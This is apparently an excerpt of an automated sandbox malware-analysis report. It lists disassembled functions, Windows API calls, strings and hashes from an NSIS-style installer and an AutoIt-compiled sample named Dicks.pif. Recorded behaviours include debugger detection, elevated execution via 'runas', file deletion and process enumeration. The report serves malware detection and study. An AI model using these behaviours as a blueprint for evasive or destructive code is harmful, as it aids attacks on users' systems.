Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 13cbdd23df18d036de9d5c22efd7f5e469270204adcf9325ac20a19b3184ad94
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69

Function 004062CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 004062D1, 004062D6

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: CloseHandlelstrlenwvsprintf
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3509786178-2769509956
Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E

Function 00405DE2 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

Memory Dump Source

Source File: 00000008.00000002.2497286444.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.2497258053.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000420000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.0000000000434000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497348127.000000000046B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.2497832965.0000000000500000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_SymposiumTaiwan.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

Analysis Process: Dicks.pifPID: 2836, Parent PID: 6792COMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	2000
Total number of Limit Nodes:	32

Executed Functions

Function 00045240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0004526C
IsDebuggerPresent.KERNEL32 ref: 0004527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000452E6

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

Part of subcall function 0003BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0003BC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00045366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00080B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00080B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,000E6D10), ref: 00080BE9
ShellExecuteW.SHELL32(00000000), ref: 00080BF0

Part of subcall function 0004514C: GetSysColorBrush.USER32(0000000F), ref: 00045156
Part of subcall function 0004514C: LoadCursorW.USER32(00000000,00007F00), ref: 00045165
Part of subcall function 0004514C: LoadIconW.USER32(00000063), ref: 0004517C
Part of subcall function 0004514C: LoadIconW.USER32(000000A4), ref: 0004518E
Part of subcall function 0004514C: LoadIconW.USER32(000000A2), ref: 000451A0
Part of subcall function 0004514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000451C6
Part of subcall function 0004514C: RegisterClassExW.USER32(?), ref: 0004521C

Part of subcall function 000450DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00045109
Part of subcall function 000450DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0004512A
Part of subcall function 000450DB: ShowWindow.USER32(00000000), ref: 0004513E
Part of subcall function 000450DB: ShowWindow.USER32(00000000), ref: 00045147

Part of subcall function 000459D3: _memset.LIBCMT ref: 000459F9
Part of subcall function 000459D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00045A9E

Strings

runas, xrefs: 00080BE4
AutoIt, xrefs: 00080B23
It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00080B28

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
API String ID: 529118366-2030392706
Opcode ID: 6f4b776794a48943217f5b5964f9892097b85a282feeefa6eedde7bf19bf5797
Instruction ID: cc54c018d790442f152c9024b164de237585e273a6be392f5ba4216274634fb7
Opcode Fuzzy Hash: 6f4b776794a48943217f5b5964f9892097b85a282feeefa6eedde7bf19bf5797
Instruction Fuzzy Hash: D65125B0A0824CAFEF51ABB0DC46EFD7B78AF05341F104075F655621A3CBB85A45EB26

Function 0009FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120
filesleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00041A36: _memmove.LIBCMT ref: 00041A77

FindFirstFileW.KERNELBASE(?,?,*.*,?,?,00000000,00000000), ref: 0009FA83
FindClose.KERNELBASE(00000000), ref: 0009FB96

Part of subcall function 000352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000352E6

Sleep.KERNEL32(0000000A), ref: 0009FAB3
_wcscmp.LIBCMT ref: 0009FAC7
_wcscmp.LIBCMT ref: 0009FAE2
FindNextFileW.KERNELBASE(?,?), ref: 0009FB80

Strings

*.*, xrefs: 0009FA68

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: 263f337d6b51c261d673e71e57882468a7cb92584b635ecc4953bc8d5fa5b2ae
Instruction ID: 6ee4187b6d7b06a607b83db17fa824b95b2a3aca2973cce78d662c0768ca6e4c
Opcode Fuzzy Hash: 263f337d6b51c261d673e71e57882468a7cb92584b635ecc4953bc8d5fa5b2ae
Instruction Fuzzy Hash: C8416EB194021BAFDF54DF64CC59AEEBBB4FF09354F144166E814E22A1EB309E84DB90

Function 00094005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00050284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00042A58,?,00008000), ref: 000502A4

Part of subcall function 00094FEC: GetFileAttributesW.KERNELBASE(?,00093BFE), ref: 00094FED

FindFirstFileW.KERNELBASE(?,?), ref: 0009407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 000940CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 000940DD
FindClose.KERNEL32(00000000), ref: 000940F4
FindClose.KERNEL32(00000000), ref: 000940FD

Strings

\*.*, xrefs: 0009404E

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 4c3b32040216df228da1e3817917ba34accb1194bb9f933f852d17e8ce5f3ec3
Instruction ID: 25e3a7ce5635b3fae2996ae7a67a2452747baadd7e1f1dd12c14e9eb14729196
Opcode Fuzzy Hash: 4c3b32040216df228da1e3817917ba34accb1194bb9f933f852d17e8ce5f3ec3
Instruction Fuzzy Hash: 8F3180710083859BC710EB60D896CEFB7E8BF95304F440A2DF9E182192DB359A0DD766

Function 00094148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0009416D
Process32FirstW.KERNEL32(00000000,?), ref: 0009417B
Process32NextW.KERNEL32(00000000,?), ref: 0009419B
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00094245

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 496250ceaed212ec1e9ba7592efcc82cf5450d256639c8071a5e408d2183246c
Instruction ID: e2e9a448cb6c1749014cb03005645a2ae281c326cefdc7b426d333801c5b5f22
Opcode Fuzzy Hash: 496250ceaed212ec1e9ba7592efcc82cf5450d256639c8071a5e408d2183246c
Instruction Fuzzy Hash: 9B31B1B11083419FD714EF50D885EEFBBE8BF95350F44052DF995C21A2EBB0AA89CB52

Function 0003B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON

Download Yara Rule

APIs

Part of subcall function 00043740: CharUpperBuffW.USER32(?,000F71DC,00000001,?,00000000,000F71DC,?,000353A5,?,?,?,?), ref: 0004375D

_memmove.LIBCMT ref: 0003B68A

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: BuffCharUpper_memmove
String ID:
API String ID: 2819905725-0
Opcode ID: 79663cd4dd6116227b21b86a6abc0bb8804a3ddf2098712b02ef2c90754bada8
Instruction ID: 6998bc181c912a68e95c9c9e84be10b2ddfe7f35d7d8161f7b824191d3fc7be0
Opcode Fuzzy Hash: 79663cd4dd6116227b21b86a6abc0bb8804a3ddf2098712b02ef2c90754bada8
Instruction Fuzzy Hash: 1EA28A70A087418FD762CF14C480B6AB7E9FF84308F14896DE99A8B362D775ED45CB92

Function 0009494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0007FC86), ref: 0009495A
FindFirstFileW.KERNELBASE(?,?), ref: 0009496B
FindClose.KERNEL32(00000000), ref: 0009497B

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 74a356c047acba84dda45e59b66cec52858f4338e865bf229d759114cf677542
Instruction ID: bea8a3fe8ed0cd6cdeeb7c8df901af44d152f6bbe0f61cbca48b773f7cc3c8e4
Opcode Fuzzy Hash: 74a356c047acba84dda45e59b66cec52858f4338e865bf229d759114cf677542
Instruction Fuzzy Hash: 60E0DF31820506EBA6106778EC0DCEAB7AC9F07339F100705F835C21E0EB749944A696

Function 000394E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac48f682114477f5669112b58c3291e1c2db94f11074634d9d85d2ecc9a4371d
Instruction ID: 177faecc63496f757d5c2417bc001c21dbc3838deecf26b20101c500b1e873f8
Opcode Fuzzy Hash: ac48f682114477f5669112b58c3291e1c2db94f11074634d9d85d2ecc9a4371d
Instruction Fuzzy Hash: 8522AE74E04206DFDB65DF58C480BAEB7F8FF45300F148169E84AAB392D7B4A985CB91

Function 0003BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0003BF57

Part of subcall function 000352B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000352E6

Sleep.KERNEL32(0000000A,?,?), ref: 000736B5

Strings

@GUI_CTRLID, xrefs: 0007376C
CALL, xrefs: 0003C277
@GUI_WINHANDLE, xrefs: 000737C1
@GUI_CTRLHANDLE, xrefs: 00073816
@COM_EVENTOBJ, xrefs: 00073D2E
@TRAY_ID, xrefs: 00073FCD

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: MessagePeekSleepTimetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
API String ID: 1792118007-922114024
Opcode ID: c2cfddac7f5f385a2e1ae090f5237b36d25157020a3d5792f648e0fa9a09ba55
Instruction ID: e695c5a997f26f4fec94bfa890076dfd5ed45b617d871c44fd025b4786110e34
Opcode Fuzzy Hash: c2cfddac7f5f385a2e1ae090f5237b36d25157020a3d5792f648e0fa9a09ba55
Instruction Fuzzy Hash: 45C2C270A08341DFE729DF24C884BAEB7E5BF84304F14891DF58A972A2CB75E944DB46

Function 00050429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00041821: _memmove.LIBCMT ref: 0004185B

GetForegroundWindow.USER32(000C0980,?,?,?,?,?), ref: 000504E3
IsWindow.USER32(?), ref: 000866BB

Strings

ALL, xrefs: 00086622
REGEXPCLASS, xrefs: 00086506
TITLE, xrefs: 00086650
ACTIVE, xrefs: 00086488
CLASS, xrefs: 000864E5
HANDLE, xrefs: 0008649E
LAST, xrefs: 00086472
INSTANCE, xrefs: 000865FA
REGEXPTITLE, xrefs: 000864B4

Memory Dump Source

Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true

Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_30000_Dicks.jbxd

Similarity

API ID: Window$Foreground_memmove
String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
API String ID: 3828923867-1919597938
Opcode ID: 6a1aeb3679ecb56b4deabdccea4abe3f305f68d05f09b24359f3d9000eee0084
Instruction ID: 3bb4af69b2edec76f8dc52c7bcec08915e20341cf2114cd4239bf19b7a317001
Opcode Fuzzy Hash: 6a1aeb3679ecb56b4deabdccea4abe3f305f68d05f09b24359f3d9000eee0084
Instruction Fuzzy Hash: D4D1E270108642DFCB54FF20C9819EEBBB4BF55344F104A29F895572A2DB31F9A9CB92

Function 0008BA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0008BAB1
_wcscmp.LIBCMT ref: 0008BAC2
GetWindowTextW.USER32(00000001,?,00000400), ref: 0008BAEA
CharUpperBuffW.USER32(?,00000000), ref: 0008BB07
_wcscmp.LIBCMT ref: 0008BB25
_wcsstr.LIBCMT ref: 0008BB36
GetClassNameW.USER32(00000018,?,00000400), ref: 0008BB6E
